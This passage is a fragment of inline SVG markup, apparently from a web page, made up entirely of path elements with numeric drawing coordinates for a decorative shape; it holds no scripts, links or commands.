d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,